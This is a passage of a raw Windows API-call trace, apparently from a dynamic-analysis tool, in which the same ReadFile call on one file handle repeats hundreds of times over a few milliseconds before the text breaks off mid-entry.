[0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.940] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.941] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.942] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.943] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.944] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.944] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.944] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.944] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.945] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.946] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.971] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.972] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, 